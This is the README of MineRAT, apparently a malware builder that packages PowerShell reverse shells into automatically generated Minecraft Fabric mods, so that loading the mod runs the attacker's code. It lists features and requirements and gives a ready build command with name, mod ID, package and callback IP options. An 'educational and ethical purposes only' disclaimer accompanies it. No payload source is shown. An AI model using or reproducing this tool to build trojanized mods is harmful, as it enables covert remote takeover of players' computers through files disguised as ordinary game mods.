MineRAT is a custom dropper framework that uses Minecraft mods as a vehicle for payload delivery.
By embedding reverse shell logic directly into the mod initialization phase, it turns mod loading into code execution.
- ⚒️ Uses Fabric CLI for clean mod generation
- 🐚 Embeds PowerShell-based reverse shell payloads
- 🧱 Auto-generates complete Fabric mod structure
This tool is intended for educational and ethical purposes only.
Misuse of MineRAT for unauthorized access or malicious activity is illegal and strictly discouraged.
The author assumes no responsibility for damage caused by the misuse of this tool.
- Go 1.20+
- Java JDK 17+
- Fabric CLI (installed automatically if missing)
go run main.go -name iris -path build/IrisMod -modid isirs -packageName com.isris.irsis -version 1.21.4 -ip 127.0.0.1